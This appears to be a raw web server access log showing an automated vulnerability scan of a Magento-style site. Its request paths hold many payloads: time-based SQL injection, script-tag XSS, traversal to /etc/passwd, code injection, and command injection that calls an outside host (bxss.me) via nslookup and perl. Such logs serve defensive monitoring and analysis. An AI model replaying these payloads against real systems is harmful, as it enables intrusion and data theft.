/acc/js/'\"()&%25<acx><ScRiPt%20>gf47(9430)<%2fScRiPt>/adminhtml/ 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/mage/adminhtml/ 1 https://104.36.149.61/
/acc/js/1some_inexistent_file_with_long_name%00.jpg/adminhtml/events.js 1 https://104.36.149.61/
/-1%20OR%202+845-845-1=0+0+0+1/skin/adminhtml/ 1 https://104.36.149.61/
/backup_104.sql.gz 1 -
/pmZOOwRO')%20OR%20451=(SELECT%20451%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/index.php/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/wizard/locale/ 1 https://104.36.149.61/
/'%3bprint(md5(31337))%3b$a='/js/scriptaculous/effects.js 1 -
//js/prototype/extended_debug.js 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.jpg/prototype/prototype.js 1 https://104.36.149.61/
/acc/skin/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/ 1 -
/css/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/shells 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/js/mage/'\"()&%25<acx><ScRiPt%20>WvSu(9681)<%2fScRiPt>/events.js 1 https://104.36.149.61/
/eOSSfI1v3b.cfm 1 -
/acc/skin'\"()&%25<acx><ScRiPt%20>PQf4(9280)<%2fScRiPt>/adminhtml/ 1 https://104.36.149.61/
//js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/acc'%20AND%202*3*8=6*8%20AND%20'eYUx'='eYUx/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/mage/adminhtml/backup.js 1 https://104.36.149.61/
/echo%20rcbkhb$()\\%20yftoag\\nz^xyu||a%20%23'%20&echo%20rcbkhb$()\\%20yftoag\\nz^xyu||a%20%23|\"%20&echo%20rcbkhb$()\\%20yftoag\\nz^xyu||a%20%23/skin/install/default/ 1 -
/acc/skin/install/default/default/%2fxfs.bxss.me/reset.css 1 -
/..%2facc/js/prototype/extended_debug.js 1 https://104.36.149.61/
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/prototype/debug.js 1 https://104.36.149.61/
/roller-ui/login.rol 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'cIxy'!='cIxy%25/js/prototype/extended_debug.js 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/skin/adminhtml/default/ 1 https://104.36.149.61/
/xmlrpc/server.php 4 -
/acc/js/prototype/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/ 1 https://104.36.149.61/
/acc/%3b(nslookup%20hitiwkvcvuqnx9f7f5.bxss.me||perl%20-e%20\"gethostbyname('hitiwkvcvuqnx9f7f5.bxss.me')\")|(nslookup%20hitiwkvcvuqnx9f7f5.bxss.me||perl%20-e%20\"gethostbyname('hitiwkvcvuqnx9f7f5.bxss.me')\")&(nslookup%20hitiwkvcvuqnx9f7f5.bxss.me||perl%2 1 -
/acc'\"()&%25<acx><ScRiPt%20>KhMd(9627)<%2fScRiPt>/index.php/install/wizard/config/ 1 https://104.36.149.61/
/${@print(md5(31337))}\\/js/mage/adminhtml/backup.js 1 -
/acc'||'/js/prototype/windows/ 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/js/prototype/windows/themes/ 1 https://104.36.149.61/
/104_backup.tar 1 -
/|(nslookup%20hitdnrtxahlbd941da.bxss.me||perl%20-e%20\"gethostbyname('hitdnrtxahlbd941da.bxss.me')\")/js/prototype/tooltip_manager.js 1 -
/scripts/tinymce 1 -
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/adminhtml/events.js 1 https://104.36.149.61/
/'.print(md5(31337)).'/js/scriptaculous/effects.js 1 -
/zpG7gJPF.txt 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/install/wizard/config/ 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/events.js 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/install/default/default/css/ie7minus.css 1 -
/cgi-bin/welcome 3 -
/acc/12345'\"\\'\\\") 43 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>KYzi(9068)<%2fScRiPt>/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/index.php/..%2fweb.config 1 -
/plugins/fckeditor 2 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/mage/ 1 -
/m52b26pE')%20OR%20289=(SELECT%20289%20FROM%20PG_SLEEP(15))--/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/acc'%20AND%202*3*8=6*8%20AND%20'SoAM'='SoAM/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/'+'A'.concat(70-3).concat(22*4).concat(107).concat(84).concat(116).concat(75)+(require'socket'%0aSocket.gethostbyname('hitjd'+'vovgjqaiaf79f.bxss.me.')[3].to_s)+'/skin/frontend/ 1 -
/-1%20OR%203+23-23-1=0+0+0+1/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/-1%20OR%202+851-851-1=0+0+0+1/js/scriptaculous/effects.js 1 https://104.36.149.61/
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/-1%20OR%203+36-36-1=0+0+0+1/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/adminhtml/giftmessage.js 1 -
/acc'||'/js/prototype/debug.js 1 https://104.36.149.61/
/acc/index.php/../../../../../Gemfile 1 -
/'.print(md5(31337)).'/skin/adminhtml/default/ 1 -
/common/scripts/phpThumb/phpThumb.php 1 -
/\"%3bprint(md5(31337))%3b$a=\"/js/prototype/debug.js 1 -
/$(nslookup%20hitrwzauulxsod2e27.bxss.me||perl%20-e%20\"gethostbyname('hitrwzauulxsod2e27.bxss.me')\")/js/mage/adminhtml/image.js 1 -
/@@kKGUz/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/product/ 1 https://104.36.149.61/
/acc/.%2fjs/prototype/windows/ 1 https://104.36.149.61/
/acc/skin/install/default/default<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/css/reset.css 1 -
/|(nslookup%20hitnxykdyfowk56c4f.bxss.me||perl%20-e%20\"gethostbyname('hitnxykdyfowk56c4f.bxss.me')\")/js/prototype/windows/ 1 -
/'+'A'.concat(70-3).concat(22*4).concat(112).concat(89).concat(112).concat(76)+(require'socket'%0aSocket.gethostbyname('hitwz'+'dtadnznu46265.bxss.me.')[3].to_s)+'/js/mage/adminhtml/form.js 1 -
/<!--/js/prototype/extended_debug.js 1 -
/acc/index.php/../../../../Gemfile 1 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/accordion.js 1 -
/!(()&&!|*|*|/skin/adminhtml/ 1 https://104.36.149.61/
/module/tiny_mce 1 -
/'+'A'.concat(70-3).concat(22*4).concat(110).concat(68).concat(97).concat(65)+(require'socket'%0aSocket.gethostbyname('hitxu'+'sjflnqsb87091.bxss.me.')[3].to_s)+'/js/prototype/prototype.js 1 -
/acc/index.php'\"()&%25<acx><ScRiPt%20>pdCA(9087)<%2fScRiPt>/install/ 1 https://104.36.149.61/
/echo%20lxwxvj$()\\%20dkhfqn\\nz^xyu||a%20%23'%20&echo%20lxwxvj$()\\%20dkhfqn\\nz^xyu||a%20%23|\"%20&echo%20lxwxvj$()\\%20dkhfqn\\nz^xyu||a%20%23/js/mage/adminhtml/uploader/ 1 -
/WEB-INF/web.xml 1 -
/acc/index.php/install/wizard/config/..%2fpackage.json 1 -
/${@print(md5(31337))}/js/prototype/extended_debug.js 1 -
/adminer-4.6.1-mysql.php 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'zUBC'!='zUBC%25/js/varien/js.js 1 https://104.36.149.61/
/acc/js/mage/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/browser.js 1 -
/icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/shells 1 -
/acc/index.php/install/wizard/config//..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215windows/win.ini 1 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/mage/adminhtml/ 1 -
/adminer-4.3.0-en.php 1 https://104.36.149.61/
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/adminhtml/browser.js 1 -
/^(%23$!@%23$)(()))******/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc/.%2fjs/mage/adminhtml/ 1 https://104.36.149.61/
/\"+\"A\".concat(70-3).concat(22*4).concat(106).concat(84).concat(109).concat(89)+(require\"socket\"%0aSocket.gethostbyname(\"hituf\"+\"lzkcsiqwc1b0e.bxss.me.\")[3].to_s)+\"/js/mage/adminhtml/accordion.js 1 -
/$(nslookup%20hitmsnwhwokvdfaf9b.bxss.me||perl%20-e%20\"gethostbyname('hitmsnwhwokvdfaf9b.bxss.me')\")/skin/install/default/default/css/ie7minus.css 1 -
/backup.sql 1 -
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/%2fxfs.bxss.me/mage/adminhtml/uploader/ 1 -
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/mage/adminhtml/giftmessage.js 1 -
/acc/js/mage/adminhtml'\"()&%25<acx><ScRiPt%20>QEM2(9290)<%2fScRiPt>/form.js 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/js/varien/js.js 1 https://104.36.149.61/
/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php 1 -
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/if(now()=sysdate(),sleep(15),0)/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/'.gethostbyname(lc('hitpd'.'torrjwwq682b1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(75).chr(103).chr(72).'/skin/adminhtml/default/ 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/prototype/tooltip_manager.js 1 -
/)/js/prototype/prototype.js 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/<!--/js/prototype/prototype.js 1 -
/|echo%20fwpmmg$()\\%20dtxdnz\\nz^xyu||a%20%23'%20|echo%20fwpmmg$()\\%20dtxdnz\\nz^xyu||a%20%23|\"%20|echo%20fwpmmg$()\\%20dtxdnz\\nz^xyu||a%20%23/js/prototype/windows/ 1 -
/-1%20OR%202+616-616-1=0+0+0+1/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/js/..%2fprototype/debug.js 1 https://104.36.149.61/
/acc/index.php/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/wizard/locale/ 1 https://104.36.149.61/
/$(nslookup%20hitjavynvmlpr81fb6.bxss.me||perl%20-e%20\"gethostbyname('hitjavynvmlpr81fb6.bxss.me')\")/skin/install/default/ 1 -
/104_backup.zip 1 -
/acc/js/prototype/1%00%c0%a7%c0%a2%252527%252522/themes/ 1 https://104.36.149.61/
/acc/js/%3b(nslookup%20hitbcsvctnsgh6067c.bxss.me||perl%20-e%20\"gethostbyname('hitbcsvctnsgh6067c.bxss.me')\")|(nslookup%20hitbcsvctnsgh6067c.bxss.me||perl%20-e%20\"gethostbyname('hitbcsvctnsgh6067c.bxss.me')\")&(nslookup%20hitbcsvctnsgh6067c.bxss.me||per 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/install/wizard/config/ 1 https://104.36.149.61/
/ui/authentication/ 1 -
/acc'||'/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/accordion.js 1 https://104.36.149.61/
/fQVnqrtB')%20OR%20787=(SELECT%20787%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/&echo%20litsft$()\\%20wbnvhl\\nz^xyu||a%20%23'%20&echo%20litsft$()\\%20wbnvhl\\nz^xyu||a%20%23|\"%20&echo%20litsft$()\\%20wbnvhl\\nz^xyu||a%20%23/skin/install/default/default/css/boxes.css 1 -
/acc'||'/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/tomcat/manager/status/ 1 -
/acc/skin/install/default/bxss.me%2ft%2fxss.html%3f%2500/css/clears.css 1 -
/acc/js/mage<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/adminhtml/sales/ 1 -
/portal/webclient/index.html 1 -
/acc/index.php/install/wizard/beginPost//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd 1 -
/searchblox/plugin/index.html 1 -
/acc/%3b(nslookup%20hitywjomttzrx0da80.bxss.me||perl%20-e%20\"gethostbyname('hitywjomttzrx0da80.bxss.me')\")|(nslookup%20hitywjomttzrx0da80.bxss.me||perl%20-e%20\"gethostbyname('hitywjomttzrx0da80.bxss.me')\")&(nslookup%20hitywjomttzrx0da80.bxss.me||perl%2 1 -
/104_db.sql 1 -
/&(nslookup%20hituzttzjycjh018c3.bxss.me||perl%20-e%20\"gethostbyname('hituzttzjycjh018c3.bxss.me')\")&'\\\"`0&(nslookup%20hituzttzjycjh018c3.bxss.me||perl%20-e%20\"gethostbyname('hituzttzjycjh018c3.bxss.me')\")&`'/js/mage/adminhtml/browser.js 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/acc/index.php/install/..%2fpackage-lock.json 1 -
//config.inc.php 1 -
/'\"()&%25<acx><ScRiPt%20>Thnf(9393)<%2fScRiPt>/js/mage/translate.js 1 https://104.36.149.61/
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/prototype/tooltip.js 1 https://104.36.149.61/
/1'\"/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/bxss.me%2ft%2fxss.html%3f%2500/install/default/default/ 1 -
/acc/index.php/install/wizard/beginPost/..%2fGemfile 1 -
/WEB-INF%20-%20Copy/web.xml 1 -
/r58.php 1 -
/^(%23$!@%23$)(()))******/js/varien/js.js 1 https://104.36.149.61/
/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php 1 -
/WEB-INF/web.xml%20(copy) 1 -
/../../../../package-lock.json 1 -
/3tGTSQ8A/skin/adminhtml/default/ 1 https://104.36.149.61/
/acc/skin/install/.%2fdefault/default/css/iestyles.css 1 https://104.36.149.61/
/acc/js'\"()&%25<acx><ScRiPt%20>sGFI(9772)<%2fScRiPt>/prototype/tooltip.js 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>Thnf(9195)<%2fScRiPt>/mage/translate.js 1 https://104.36.149.61/
/acc/.%2fjs/prototype/validation.js 1 https://104.36.149.61/
/\"+response.write(9229203*9108783)+\"/js/mage/ 1 -
/1'\"/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/${10000441+10000349}/js/prototype/ 1 -
/acc9473731/index.php/install/wizard/config/ 1 https://104.36.149.61/
/'.print(md5(31337)).'/skin/install/default/default/css/clears.css 1 -
/%2fxfs.bxss.me/js/mage/adminhtml/accordion.js 1 -
/acc'||'/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/mage/adminhtml/grid.js 1 -
/acc'\"()&%25<acx><ScRiPt%20>pdCA(9156)<%2fScRiPt>/index.php/install/ 1 https://104.36.149.61/
/app/config/database.yml_original 1 -
/^(%23$!@%23$)(()))******/js/mage/translate.js 1 https://104.36.149.61/
/7UxX 1 -
/&(nslookup%20hitzzfnuvfxxtadc88.bxss.me||perl%20-e%20\"gethostbyname('hitzzfnuvfxxtadc88.bxss.me')\")&'\\\"`0&(nslookup%20hitzzfnuvfxxtadc88.bxss.me||perl%20-e%20\"gethostbyname('hitzzfnuvfxxtadc88.bxss.me')\")&`'/skin/install/default/default/ 1 -
/yEvmWhiu'%20OR%20664=(SELECT%20664%20FROM%20PG_SLEEP(15))--/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/acc/skin/install/.%2fdefault/default/css/reset.css 1 https://104.36.149.61/
/${@print(md5(31337))}/js/mage/adminhtml/sales/ 1 -
/FB742HcH/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/lib/fckeditor 2 -
/acc/js/prototype<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/tooltip.js 1 -
/acc/'\"()&%25<acx><ScRiPt%20>mxOU(9299)<%2fScRiPt>/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/giftoptions/ 1 https://104.36.149.61/
/acc/skin/bxss.me%2ft%2fxss.html%3f%2500/default/default/css/boxes.css 1 -
/acc/..%2fjs/mage/ 1 https://104.36.149.61/
/^(%23$!@%23$)(()))******/skin/adminhtml/default/ 1 https://104.36.149.61/
/scripts/openflashchart/open-flash-chart/php-ofc-library/ofc_upload_image.php 1 -
/1some_inexistent_file_with_long_name%00.jpg/skin/adminhtml/ 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/windows/themes/ 1 https://104.36.149.61/
/acc/skin/install/bxss.me%2ft%2fxss.html%3f%2500/default/css/clears.css 1 -
/acc/index.php/..%2f..%2f..%2fGemfile 1 -
/'.print(md5(31337)).'/index.php/install/ 1 -
/bxss.me/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/cgi-bin/.bash_history 1 -
/VLeuJhmU')%20OR%20665=(SELECT%20665%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc/skin/..%2finstall/default/default/css/clears.css 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost/..%2fpackage.json 1 -
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/adminhtml/wysiwyg/ 1 -
/acc'||'/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/acc\"%20AND%202*3*8=6*8%20AND%20\"dPhM\"=\"dPhM/skin/adminhtml/default/ 1 https://104.36.149.61/
/FRt9a8wf'))%20OR%20347=(SELECT%20347%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/wp-login.php 1 -
/acc/js/varien'\"()&%25<acx><ScRiPt%20>TmT7(9279)<%2fScRiPt>/form.js 1 https://104.36.149.61/
/acc/bxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/backup.js 1 -
/acc/js/varien/12345'\"\\'\\\") 1 https://104.36.149.61/
/acc/index.php'\"()&%25<acx><ScRiPt%20>6DR8(9902)<%2fScRiPt>/install/wizard/locale/ 1 https://104.36.149.61/
/backup.rar 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/prototype/ 1 -
/'+response.write(9598149*9564332)+'/js/scriptaculous/effects.js 1 -
/response.write(9732476*9061845)/js/mage/adminhtml/form.js 1 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/backup.js 1 -
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/varien/js.js 1 -
/..%2facc/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/acc/js/prototype/window_effects.js/988410%40 1 https://104.36.149.61/
/(nslookup%20hitoelfiabneo90945.bxss.me||perl%20-e%20\"gethostbyname('hitoelfiabneo90945.bxss.me')\")/skin/install/default/default/css/boxes.css 1 -
/acc9119944/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/104.36.149.61_db.tar 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/prototype/extended_debug.js 1 https://104.36.149.61/
/acc/js/varien/'\"()&%25<acx><ScRiPt%20>TmT7(9424)<%2fScRiPt>.js 1 https://104.36.149.61/
/acc/skin/install/'\"()&%25<acx><ScRiPt%20>eCQQ(9720)<%2fScRiPt>/default/css/clears.css 1 https://104.36.149.61/
/acc/index.php/'\"()&%25<acx><ScRiPt%20>6DR8(9025)<%2fScRiPt>/wizard/locale/ 1 https://104.36.149.61/
/%2fxfs.bxss.me/js/mage/adminhtml/hash.js 1 -
/@@SePq2/index.php/install/wizard/config/ 1 https://104.36.149.61/
//..\\..\\..\\..\\..\\..\\..\\..\\windows/win.ini 2 -
/acc/index.php/../../web.config 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(111).concat(82).concat(121).concat(77)+(require\"socket\"%0aSocket.gethostbyname(\"hitao\"+\"vjdhqrcn7b72c.bxss.me.\")[3].to_s)+\"/js/prototype/tooltip.js 1 -
/styles/../../../../../../../../../../../../../etc/shells 1 -
/4KYtdnhv'))%20OR%20632=(SELECT%20632%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/install/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost/..%2f..%2f..%2f..%2f..%2fGemfile 1 -
/acc/js/prototype/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/themes/ 1 https://104.36.149.61/
/acc/js/prototype/.%2fwindows/ 1 https://104.36.149.61/
/composer.json 1 -
///remote/fgt_lang 11 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/mage/translate.js 1 https://104.36.149.61/
/log/view 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/mage/adminhtml/browser.js 1 https://104.36.149.61/
/|(nslookup%20hitaashstnvdbd6eed.bxss.me||perl%20-e%20\"gethostbyname('hitaashstnvdbd6eed.bxss.me')\")/index.php/install/wizard/config/ 1 -
//%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/WEB-INF/web.xml 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/index.php/install/../../../../../package-lock.json 1 -
/bxss.me/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/skin/install/default/default/css/boxes<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>.css 1 -
/acc'%20AND%202*3*8=6*8%20AND%20'hDyT'='hDyT/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/prototype/validation.js 1 https://104.36.149.61/
/acc/js/prototype/.%2fwindows/themes/ 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/mage/adminhtml/image.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/prototype/windows/ 1 https://104.36.149.61/
//..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../....//etc/passwd 1 -
/acc/js/mage'\"()&%25<acx><ScRiPt%20>2DaK(9658)<%2fScRiPt>/ 1 https://104.36.149.61/
/acc/js/'\"()&%25<acx><ScRiPt%20>bt2L(9861)<%2fScRiPt>/adminhtml/hash.js 1 https://104.36.149.61/
/&echo%20jrjqqc$()\\%20olksig\\nz^xyu||a%20%23'%20&echo%20jrjqqc$()\\%20olksig\\nz^xyu||a%20%23|\"%20&echo%20jrjqqc$()\\%20olksig\\nz^xyu||a%20%23/js/mage/adminhtml/accordion.js 1 -
/acc/index.php/install/wizard/locale//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini 2 -
/acc/js/mage/adminhtml'\"()&%25<acx><ScRiPt%20>ZcmW(9055)<%2fScRiPt>/grid.js 1 https://104.36.149.61/
/acc/index.php/install/%2fxfs.bxss.me/locale/ 1 -
//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd 1 -
/acc/js/mage/adminhtml'\"()&%25<acx><ScRiPt%20>yxiC(9947)<%2fScRiPt>/giftoptions/ 1 https://104.36.149.61/
/acc/js/.%2fprototype/debug.js 1 https://104.36.149.61/
/1kqvEDc8O/js/mage/translate.js 1 -
/acc/skin/install/default/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/css/reset.css 1 -
/'.gethostbyname(lc('hitfi'.'zpfhykfu0f69b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(80).chr(104).chr(90).'/js/prototype/debug.js 1 -
//skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc9483700/js/varien/js.js 1 https://104.36.149.61/
/iXJQ 1 -
/zehir.php 1 -
/acc/skin/install/default/default/css'\"()&%25<acx><ScRiPt%20>eCQQ(9297)<%2fScRiPt>/clears.css 1 https://104.36.149.61/
/acc/index.php//../../WEB-INF/web.xml 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/mage/translate.js 1 -
/fckeditor 2 -
/$(nslookup%20hitpzvglldrfs08109.bxss.me||perl%20-e%20\"gethostbyname('hitpzvglldrfs08109.bxss.me')\")/index.php/install/wizard/locale/ 1 -
/`(nslookup%20hitvlzemyozll8cf43.bxss.me||perl%20-e%20\"gethostbyname('hitvlzemyozll8cf43.bxss.me')\")`/js/prototype/tooltip.js 1 -
/\".gethostbyname(lc(\"hituf\".\"gsfgyrys17ab6.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(117).chr(88).chr(112).chr(88).\"/skin/install/default/default/css/boxes.css 1 -
/acc/skin/install/default/1%00%c0%a7%c0%a2%252527%252522/ 1 https://104.36.149.61/
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/project.xml 1 -
/cgi-bin/Gulpfile.coffee 1 -
/libraries/tinymce 1 -
/backup.tgz 1 -
/soap.php 4 -
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js.js 1 -
/$(nslookup%20hitggddqljbmh17b8c.bxss.me||perl%20-e%20\"gethostbyname('hitggddqljbmh17b8c.bxss.me')\")/js/mage/adminhtml/hash.js 1 -
/_layouts/scriptresx.ashx 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/!(()&&!|*|*|/js/prototype/windows/themes/ 1 https://104.36.149.61/
//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd 1 -
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/adminhtml/wysiwyg/ 1 -
/acc/index.php/install/wizard/beginPost//../../WEB-INF/web.xml%00.jsp 1 -
/acc/index.php/../../../Gemfile 1 -
/\"+response.write(9274377*9995990)+\"/js/prototype/debug.js 1 -
/acc/index.php/install/..%2f..%2f..%2f..%2f..%2fpackage.json 1 -
/'+'A'.concat(70-3).concat(22*4).concat(117).concat(76).concat(119).concat(65)+(require'socket'%0aSocket.gethostbyname('hitly'+'skhvwkfp63371.bxss.me.')[3].to_s)+'/js/mage/adminhtml/flexuploader.js 1 -
/acc/index.php/install/wizard/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/ 1 https://104.36.149.61/
